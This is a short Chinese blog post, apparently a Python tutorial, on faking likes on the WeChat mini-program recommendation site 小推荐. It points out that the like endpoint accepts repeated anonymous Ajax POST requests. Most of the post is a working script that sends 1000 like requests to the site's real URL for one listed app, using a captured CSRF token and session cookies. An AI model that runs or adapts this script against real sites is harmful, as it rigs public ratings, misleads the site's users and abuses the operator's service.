Python例子之「小推荐」站点点赞作弊

小推荐 是一个（微信）小程序推荐站点。

其点赞操作通过 Ajax 发起 POST 请求，无需账号、无需多IP、无需刷新页面可连续发起。这是一个逻辑缺陷（疑似有意而为）。

小推荐 | 酷安日图

以下以为 小推荐 | 酷安日图 刷赞为例：

import urllib
from urllib import request

url = "http://xiao.lieyunwang.com/app/add-like"
headers = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-CSRF-Token": "UGhPSDZMLXoxXw5xbwhoPwY3PgpBA3kXZAF/BnUuYhJgXXcpY3piSQ==",
    "X-Requested-With": "XMLHttpRequest",
    "Cookie": "UM_distinctid=15c35eee9ff22-0669381c80c8ed-3321482e-38400-15c35eeea01171; Hm_lvt_e7e035075002bfbbfb97dd1986670572=1495553469,1495553548,1495553753; advanced-frontend=ospm873er826gbs9svca32shb5; _csrf-frontend=1c300d11bdbec17ab216ae4f690dee081a6a4859addc395d179a4ba42c5e05b0a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22a7A9YDEEV_qBwOTm4i0NCbOh058aU6O3%22%3B%7D; CNZZDATA1261136383=168195640-1495552863-null%7C1495593396"
}
req_data = urllib.parse.urlencode({
    "slug": "ku-an-ri-tu",
    "crsfParam": "UGhPSDZMLXoxXw5xbwhoPwY3PgpBA3kXZAF/BnUuYhJgXXcpY3piSQ=="
}).encode("utf-8")
for i in range(1000):  # 1000次
    req = request.Request(url=url, headers=headers, data=req_data)
    res = request.urlopen(req)
    res_data = res.read()
    res_data = res_data.decode("utf-8")
    print(i + 1, "请求成功" in res_data)